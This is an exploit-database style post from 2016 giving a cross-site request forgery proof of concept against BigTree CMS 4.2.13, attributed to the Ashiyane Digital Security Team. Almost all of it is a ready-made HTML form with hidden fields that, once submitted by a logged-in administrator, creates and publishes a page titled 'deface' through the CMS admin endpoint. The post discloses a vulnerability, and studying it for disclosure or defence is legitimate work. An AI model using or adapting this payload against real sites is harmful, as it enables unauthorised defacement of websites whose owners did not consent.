BigTree CMS 4.2.13 Cross Site Request Forgery

Posted on 27 October 2016
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit Title : bigtree cms CSRF Exploit
-# Author : Ashiyane Digital Security Team
-# Vendor Homepage: https://www.bigtreecms.org/
-# Software Link:
-# https://www.bigtreecms.org/ajax/download-installer/?installer=53
-# Version : 4.2.13
-# Date: 26-10-2016
-# Tested On : Windows 7 / FireFox
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
<html>
<head>
<title>Add page CSRF Exploit</title>
</head>
<H2>Add page CSRF Exploi</H2>
<body>
<form action="http://localhost/admin/pages/create/" method="POST">
<input type="hidden" name="_bigtree_post_check" value="success" />
<input type="hidden" name="parent" value="0" />
<input type="hidden" name="nav_title" value="deface" />
<input type="hidden" name="title" value="deface page title" />
<input type="hidden" name="in_nav" value="on" />
<input type="hidden" name="template" value="content" />
<input type="hidden" name="resources[page_header]" value="page header" />
<input type="hidden" name="resources[page_content]" value="deface text" />
<input type="submit" name="ptype" value="Create & Publish" />
</form>
</body>
</html>

-#-# Path of page: http://localhost/deface/

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-# Discovered by : Amir.ght -#-#
#-# Author : Ashiyane Digital Security Team -#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
TOP
Malware :

Last 20
Exploits :

Last 20